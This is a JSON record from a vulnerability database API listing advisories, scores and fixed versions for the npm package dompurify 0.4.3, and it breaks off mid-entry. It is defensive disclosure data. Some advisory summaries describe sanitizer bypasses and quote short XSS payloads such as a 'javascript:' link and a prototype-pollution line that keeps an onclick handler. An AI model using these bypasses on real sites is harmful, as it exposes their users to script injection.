Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/447249?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/447249?format=api", "purl": "pkg:npm/dompurify@0.4.3", "type": "npm", "namespace": "", "name": "dompurify", "version": "0.4.3", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "3.4.0", "latest_non_vulnerable_version": "3.4.5", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/359925?format=api", "vulnerability_id": "VCID-37xc-54fs-8fh6", "summary": "DOMPurify's ADD_TAGS function form bypasses FORBID_TAGS due to short-circuit evaluation\n## Summary\nIn `src/purify.ts:1117-1123`, `ADD_TAGS` as a function (via `EXTRA_ELEMENT_HANDLING.tagCheck`) bypasses `FORBID_TAGS` due to short-circuit evaluation.\n\nThe condition:\n```\n!(tagCheck(tagName)) && (!ALLOWED_TAGS[tagName] || FORBID_TAGS[tagName])\n```\nWhen `tagCheck(tagName)` returns `true`, the entire condition is `false` and the element is kept — `FORBID_TAGS[tagName]` is never evaluated.\n\n## Inconsistency\nThis contradicts the attribute-side pattern at line 1214 where `FORBID_ATTR` explicitly wins first:\n```\nif (FORBID_ATTR[lcName]) { continue; }\n```\nFor tags, FORBID should also take precedence over ADD.\n\n## Impact\nApplications using both `ADD_TAGS` as a function and `FORBID_TAGS` simultaneously get unexpected behavior — forbidden tags are allowed through. Config-dependent but a genuine logic inconsistency.\n\n## Suggested Fix\nCheck `FORBID_TAGS` before `tagCheck`:\n```\nif (FORBID_TAGS[tagName]) { /* remove */ }\nelse if (tagCheck(tagName) || ALLOWED_TAGS[tagName]) { /* keep */ }\n```\n\n## Affected Version\nv3.3.3 (commit 883ac15)", "references": [ { "reference_url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-39q2-94rc-95cp", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-39q2-94rc-95cp" }, { "reference_url": "https://github.com/advisories/GHSA-39q2-94rc-95cp", "reference_id": "GHSA-39q2-94rc-95cp", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-39q2-94rc-95cp" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373307?format=api", "purl": "pkg:npm/dompurify@3.4.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.4.0" } ], "aliases": [ "GHSA-39q2-94rc-95cp" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-37xc-54fs-8fh6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/81082?format=api", "vulnerability_id": "VCID-3fxk-2qcb-jfa3", "summary": "DOMPurify is a DOM-only cross-site scripting sanitizer for HTML, MathML, and SVG. Versions prior to 3.4.0 have an inconsistency between FORBID_TAGS and FORBID_ATTR handling when function-based ADD_TAGS is used. Commit c361baa added an early exit for FORBID_ATTR at line 1214. The same fix was not applied to FORBID_TAGS. At line 1118-1123, when EXTRA_ELEMENT_HANDLING.tagCheck returns true, the short-circuit evaluation skips the FORBID_TAGS check entirely. This allows forbidden elements to survive sanitization with their attributes intact. Version 3.4.0 patches the issue.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-41240.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-41240.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41240", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04347", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04346", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04355", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04359", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41240" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41240", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41240" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134892", "reference_id": "1134892", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134892" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461147", "reference_id": "2461147", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461147" }, { "reference_url": "https://github.com/cure53/DOMPurify/releases/tag/3.4.0", "reference_id": "3.4.0", "reference_type": "", "scores": [ { "value": "6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-23T17:21:26Z/" } ], "url": "https://github.com/cure53/DOMPurify/releases/tag/3.4.0" }, { "reference_url": "https://github.com/cure53/DOMPurify/commit/c361baa18dbdcb3344a41110f4c48ad85bf48f80", "reference_id": "c361baa18dbdcb3344a41110f4c48ad85bf48f80", "reference_type": "", "scores": [ { "value": "6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-23T17:21:26Z/" } ], "url": "https://github.com/cure53/DOMPurify/commit/c361baa18dbdcb3344a41110f4c48ad85bf48f80" }, { "reference_url": "https://github.com/advisories/GHSA-h7mw-gpvr-xq4m", "reference_id": "GHSA-h7mw-gpvr-xq4m", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-h7mw-gpvr-xq4m" }, { "reference_url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-h7mw-gpvr-xq4m", "reference_id": "GHSA-h7mw-gpvr-xq4m", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-23T17:21:26Z/" } ], "url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-h7mw-gpvr-xq4m" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:16476", "reference_id": "RHSA-2026:16476", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:16476" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:21338", "reference_id": "RHSA-2026:21338", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:21338" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:21772", "reference_id": "RHSA-2026:21772", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:21772" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:22619", "reference_id": "RHSA-2026:22619", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:22619" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:24977", "reference_id": "RHSA-2026:24977", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:24977" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373307?format=api", "purl": "pkg:npm/dompurify@3.4.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.4.0" } ], "aliases": [ "CVE-2026-41240", "GHSA-h7mw-gpvr-xq4m" ], "risk_score": 3.6, "exploitability": "0.5", "weighted_severity": "7.3", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-3fxk-2qcb-jfa3" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/40257?format=api", "vulnerability_id": "VCID-56ww-dvtp-8uc2", "summary": "DOMPurify is a DOM-only, super-fast, uber-tolerant XSS sanitizer for HTML, MathML and SVG. It has been discovered that malicious HTML using special nesting techniques can bypass the depth checking added to DOMPurify in recent releases. It was also possible to use Prototype Pollution to weaken the depth check. This renders dompurify unable to avoid cross site scripting (XSS) attacks. This issue has been addressed in versions 2.5.4 and 3.1.3 of DOMPurify. All users are advised to upgrade. There are no known workarounds for this vulnerability.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-45801.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.0", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-45801.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-45801", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00096", "scoring_system": "epss", "scoring_elements": "0.26786", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00096", "scoring_system": "epss", "scoring_elements": "0.26788", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00096", "scoring_system": "epss", "scoring_elements": "0.26802", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00096", "scoring_system": "epss", "scoring_elements": "0.26586", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-45801" }, { "reference_url": "https://github.com/cure53/DOMPurify/commit/1e520262bf4c66b5efda49e2316d6d1246ca7b21", "reference_id": "1e520262bf4c66b5efda49e2316d6d1246ca7b21", "reference_type": "", "scores": [ { "value": "7.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L" }, { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "value": "8.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-16T20:04:30Z/" } ], "url": "https://github.com/cure53/DOMPurify/commit/1e520262bf4c66b5efda49e2316d6d1246ca7b21" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2312631", "reference_id": "2312631", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2312631" }, { "reference_url": "https://github.com/cure53/DOMPurify/commit/26e1d69ca7f769f5c558619d644d90dd8bf26ebc", "reference_id": "26e1d69ca7f769f5c558619d644d90dd8bf26ebc", "reference_type": "", "scores": [ { "value": "7.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L" }, { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "value": "8.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-16T20:04:30Z/" } ], "url": "https://github.com/cure53/DOMPurify/commit/26e1d69ca7f769f5c558619d644d90dd8bf26ebc" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45801", "reference_id": "CVE-2024-45801", "reference_type": "", "scores": [ { "value": "7.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L" }, { "value": "8.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45801" }, { "reference_url": "https://github.com/advisories/GHSA-mmhx-hmjr-r674", "reference_id": "GHSA-mmhx-hmjr-r674", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-mmhx-hmjr-r674" }, { "reference_url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674", "reference_id": "GHSA-mmhx-hmjr-r674", "reference_type": "", "scores": [ { "value": "7.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L" }, { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-16T20:04:30Z/" } ], "url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:10762", "reference_id": "RHSA-2024:10762", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:10762" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:11381", "reference_id": "RHSA-2024:11381", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:11381" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:7324", "reference_id": "RHSA-2024:7324", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:7324" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:7706", "reference_id": "RHSA-2024:7706", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:7706" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:8014", "reference_id": "RHSA-2024:8014", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:8014" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:0892", "reference_id": "RHSA-2025:0892", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:0892" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2025:4019", "reference_id": "RHSA-2025:4019", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2025:4019" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/33397?format=api", "purl": "pkg:npm/dompurify@2.5.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-37xc-54fs-8fh6" }, { "vulnerability": "VCID-3fxk-2qcb-jfa3" }, { "vulnerability": "VCID-77rz-yewt-77cq" }, { "vulnerability": "VCID-8tpw-rcyz-xuhu" }, { "vulnerability": "VCID-cmrb-k5pw-vffn" }, { "vulnerability": "VCID-cv62-a95x-9uhe" }, { "vulnerability": "VCID-jnpe-6ax6-zubr" }, { "vulnerability": "VCID-r6b8-q386-3ken" }, { "vulnerability": "VCID-zaud-3sc4-ykcg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.5.4" }, { "url": "http://public2.vulnerablecode.io/api/packages/33396?format=api", "purl": "pkg:npm/dompurify@3.1.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-37xc-54fs-8fh6" }, { "vulnerability": "VCID-3fxk-2qcb-jfa3" }, { "vulnerability": "VCID-77rz-yewt-77cq" }, { "vulnerability": "VCID-8d4n-d1dh-4fe9" }, { "vulnerability": "VCID-8tpw-rcyz-xuhu" }, { "vulnerability": "VCID-cmrb-k5pw-vffn" }, { "vulnerability": "VCID-cv62-a95x-9uhe" }, { "vulnerability": "VCID-jnpe-6ax6-zubr" }, { "vulnerability": "VCID-r6b8-q386-3ken" }, { "vulnerability": "VCID-zaud-3sc4-ykcg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.1.3" } ], "aliases": [ "CVE-2024-45801", "GHSA-mmhx-hmjr-r674" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-56ww-dvtp-8uc2" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/359958?format=api", "vulnerability_id": "VCID-77rz-yewt-77cq", "summary": "DOMPurify USE_PROFILES prototype pollution allows event handlers\n## Summary\nWhen `USE_PROFILES` is enabled, DOMPurify rebuilds `ALLOWED_ATTR` as a plain array before populating it with the requested allowlists. Because the sanitizer still looks up attributes via `ALLOWED_ATTR[lcName]`, any `Array.prototype` property that is polluted also counts as an allowlisted attribute. An attacker who can set `Array.prototype.onclick = true` (or a runtime already subject to prototype pollution) can thus force DOMPurify to keep event handlers such as `onclick` even when they are normally forbidden. The provided PoC sanitizes `<img onclick=...>` with `USE_PROFILES` and adds the sanitized output to the DOM; the polluted prototype allows the event handler to survive and execute, turning what should be a blocklist into a silent XSS vector.\n\n## Impact\nPrototype pollution makes DOMPurify accept dangerous event handler attributes, which bypasses the sanitizer and results in DOM-based XSS once the sanitized markup is rendered.\n\n## Credits\nIdentified by Cantina’s Apex (https://www.cantina.security)", "references": [ { "reference_url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-cj63-jhhr-wcxv", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-cj63-jhhr-wcxv" }, { "reference_url": "https://github.com/advisories/GHSA-cj63-jhhr-wcxv", "reference_id": "GHSA-cj63-jhhr-wcxv", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-cj63-jhhr-wcxv" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/40110?format=api", "purl": "pkg:npm/dompurify@3.3.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-37xc-54fs-8fh6" }, { "vulnerability": "VCID-3fxk-2qcb-jfa3" }, { "vulnerability": "VCID-8d4n-d1dh-4fe9" }, { "vulnerability": "VCID-cmrb-k5pw-vffn" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.3.2" } ], "aliases": [ "GHSA-cj63-jhhr-wcxv" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-77rz-yewt-77cq" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/359752?format=api", "vulnerability_id": "VCID-8tpw-rcyz-xuhu", "summary": "DOMPurify ADD_ATTR predicate skips URI validation\n## Summary\nDOMPurify allows `ADD_ATTR` to be provided as a predicate function via `EXTRA_ELEMENT_HANDLING.attributeCheck`. When the predicate returns `true`, `_isValidAttribute` short-circuits the attribute check before URI-safe validation runs. An attacker who supplies a predicate that accepts specific attribute/tag combinations can then sanitize input such as `<a href=\"javascript:alert(document.domain)\">` and have the `javascript:` URL survive, because URI validation is skipped for that attribute while other checks still pass. The provided PoC accepts `href` for anchors and then triggers a click inside an iframe, showing that the sanitized payload executes despite the protocol bypass.\n\n## Impact\nPredicate-based allowlisting bypasses DOMPurify's URI validation, allowing unsafe protocols such as `javascript:` to reach the DOM and execute whenever the link is activated, resulting in DOM-based XSS.\n\n## Credits\nIdentified by Cantina’s Apex (https://www.cantina.security)", "references": [ { "reference_url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-cjmm-f4jc-qw8r", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-cjmm-f4jc-qw8r" }, { "reference_url": "https://github.com/advisories/GHSA-cjmm-f4jc-qw8r", "reference_id": "GHSA-cjmm-f4jc-qw8r", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-cjmm-f4jc-qw8r" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/40110?format=api", "purl": "pkg:npm/dompurify@3.3.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-37xc-54fs-8fh6" }, { "vulnerability": "VCID-3fxk-2qcb-jfa3" }, { "vulnerability": "VCID-8d4n-d1dh-4fe9" }, { "vulnerability": "VCID-cmrb-k5pw-vffn" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.3.2" } ], "aliases": [ "GHSA-cjmm-f4jc-qw8r" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-8tpw-rcyz-xuhu" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/161221?format=api", "vulnerability_id": "VCID-fp9d-g1ya-qyfx", "summary": "DOMPurify before 1.0.11 allows reverse tabnabbing in demos/hooks-target-blank-demo.html because links lack a 'rel=\"noopener noreferrer\"' attribute.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-25155", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00242", "scoring_system": "epss", "scoring_elements": "0.47882", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00242", "scoring_system": "epss", "scoring_elements": "0.47897", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00242", "scoring_system": "epss", "scoring_elements": "0.4774", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00242", "scoring_system": "epss", "scoring_elements": "0.47881", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-25155" }, { "reference_url": "https://github.com/cure53/DOMPurify/commit/7601c33a57e029cce51d910eda5179a3f1b51c83", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/cure53/DOMPurify/commit/7601c33a57e029cce51d910eda5179a3f1b51c83" }, { "reference_url": "https://github.com/cure53/DOMPurify/pull/337", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/cure53/DOMPurify/pull/337" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25155", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25155" }, { "reference_url": "https://github.com/cure53/DOMPurify/compare/1.0.10...1.0.11", "reference_id": "1.0.10...1.0.11", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T18:24:04Z/" } ], "url": "https://github.com/cure53/DOMPurify/compare/1.0.10...1.0.11" }, { "reference_url": "https://github.com/cure53/DOMPurify/pull/337/files", "reference_id": "files", "reference_type": "", "scores": [ { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T18:24:04Z/" } ], "url": "https://github.com/cure53/DOMPurify/pull/337/files" }, { "reference_url": "https://github.com/advisories/GHSA-8hgg-xxm5-3873", "reference_id": "GHSA-8hgg-xxm5-3873", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-8hgg-xxm5-3873" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/381252?format=api", "purl": "pkg:npm/dompurify@1.0.11", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-37xc-54fs-8fh6" }, { "vulnerability": "VCID-3fxk-2qcb-jfa3" }, { "vulnerability": "VCID-56ww-dvtp-8uc2" }, { "vulnerability": "VCID-77rz-yewt-77cq" }, { "vulnerability": "VCID-8tpw-rcyz-xuhu" }, { "vulnerability": "VCID-cmrb-k5pw-vffn" }, { "vulnerability": "VCID-gbb5-2vbk-suh8" }, { "vulnerability": "VCID-gzpp-fw72-57hu" }, { "vulnerability": "VCID-jnpe-6ax6-zubr" }, { "vulnerability": "VCID-nz3k-udjb-3fhz" }, { "vulnerability": "VCID-wmjr-1h3n-hbhb" }, { "vulnerability": "VCID-z8n7-dz6p-zqfb" }, { "vulnerability": "VCID-zaud-3sc4-ykcg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@1.0.11" } ], "aliases": [ "CVE-2019-25155", "GHSA-8hgg-xxm5-3873" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-fp9d-g1ya-qyfx" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/205198?format=api", "vulnerability_id": "VCID-gbb5-2vbk-suh8", "summary": "Cross-Site Scripting in dompurify", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-16728", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00962", "scoring_system": "epss", "scoring_elements": "0.77002", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00962", "scoring_system": "epss", "scoring_elements": 